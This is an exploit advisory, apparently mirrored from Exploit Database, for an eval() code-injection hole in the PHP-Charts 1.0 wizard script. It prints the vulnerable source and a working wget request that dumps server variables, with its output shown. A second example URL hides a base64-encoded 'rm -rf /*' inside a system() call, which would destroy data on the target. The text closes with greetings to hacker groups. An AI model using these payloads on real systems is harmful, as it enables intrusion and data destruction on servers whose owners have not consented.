PHP-Charts – Arbitrary PHP Code Execution

• Exploit Database
• 125 阅读

• 作者： AkaStep
  日期： 2013-01-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24201/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166

  =============================================================== Vulnerable Software: php-chart_v1.0 Official Site: http://php-charts.com/ Vuln: PHP Code Execution. =============================================================== Tested On: Debian squeeze 6.0.6 Server version: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug6 2012 20:08:59) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH   ================================================================ About Software: Php-Charts is basically a class which can be used to generate different charts(Bar, Pie, Doughnut etc.) in different format(PDF, PNG, JPG, HTML) using different data source(csv, xml, MySQL, MS Sql, MS Access, PostgreSql, user defined data). ================================================================   About vuln:     root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php <?php require("../lib/phpchart.class.php"); $color_var=array("txt_col","line_col","bg_color"); $cname=$_GET["type"]; $chart=new PHPChart($cname);   foreach($_GET as $key=>$value) { if($value!="") { if(in_array($key,$color_var)) eval(&apos;$chart->&apos;.$key.&apos;="#&apos;.$value.&apos;";&apos;); else if($value==&apos;yes&apos;) eval(&apos;$chart->&apos;.$key.&apos;=true;&apos;); else if($value==&apos;no&apos;) eval(&apos;$chart->&apos;.$key.&apos;=false;&apos;); else if(is_numeric($value)) eval(&apos;$chart->&apos;.$key.&apos;=&apos;.$value.&apos;;&apos;); else eval(&apos;$chart->&apos;.$key."=&apos;".$value."&apos;;"); } } $chart->genChart();         Exploitation:   root@debian:/tmp# wget &apos;http://hacker1.own//wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY&apos; -O out.txt && cat out.txt --2013-01-15 21:19:16--http://hacker1.own//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY Resolving hacker1.own... 127.0.0.1 Connecting to hacker1.own|127.0.0.1|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: “out.txt”   [ <=>] 1,917 --.-K/s in 0s   2013-01-15 21:19:17 (8.56 MB/s) - “out.txt” saved [1917]     Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4 array(28) { ["DOCUMENT_ROOT"]=> string(28) "/etc/apache2/htdocs/hacker1/" ["GATEWAY_INTERFACE"]=> string(7) "CGI/1.1" ["HTTP_ACCEPT"]=> string(3) "*/*" ["HTTP_CLIENT_IP"]=> string(9) "127.0.0.1" ["HTTP_HOST"]=> string(11) "hacker1.own" ["HTTP_USER_AGENT"]=> string(21) "Wget/1.12 (linux-gnu)" ["HTTP_VIA"]=> string(77) "http/1.0 debian[FE800000000000000A0027FFFE077FC6] (ApacheTrafficServer/3.2.0)" ["HTTP_X_FORWARDED_FOR"]=> string(9) "127.0.0.1" ["PATH"]=> string(4) "/bin" ["PHPRC"]=> string(14) "/etc/php5/cgi/" ["QUERY_STRING"]=> string(45) "$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY" ["REDIRECT_STATUS"]=> string(3) "200" ["REMOTE_ADDR"]=> string(9) "127.0.0.1" ["REMOTE_PORT"]=> string(5) "60830" ["REQUEST_METHOD"]=> string(3) "GET" ["REQUEST_URI"]=> string(76) "/wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY" ["SCRIPT_FILENAME"]=> string(57) "/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php" ["SCRIPT_NAME"]=> string(30) "/wp/chart/chart/wizard/url.php" ["SERVER_ADDR"]=> string(9) "127.0.0.1" ["SERVER_ADMIN"]=> string(21) "webmaster@hacker1.own" ["SERVER_NAME"]=> string(11) "hacker1.own" ["SERVER_PORT"]=> string(2) "80" ["SERVER_PROTOCOL"]=> string(8) "HTTP/1.1" ["SERVER_SIGNATURE"]=> string(0) "" ["SERVER_SOFTWARE"]=> string(6) "Apache" ["UNIQUE_ID"]=> string(24) "UPYOJH8AAQEAAE8eNfMAAAAC" ["PHP_SELF"]=> string(30) "/wp/chart/chart/wizard/url.php" ["REQUEST_TIME"]=> int(1358302756) }   Notice: Undefined variable:in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()&apos;d code on line 1   Fatal error: Cannot access empty property in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()&apos;d code on line 1 root@debian:/tmp#     Example 2:   http://hacker1.own//wp/chart/chart/wizard/url.php?&123&${var_dump(system(base64_decode(cm0gLXJmIC8q)))}=123456LoL   =====================ENDS HERE============================     ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com   to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers   Also special thanks to: ottoman38 & HERO_AZE ================================================   /AkaStep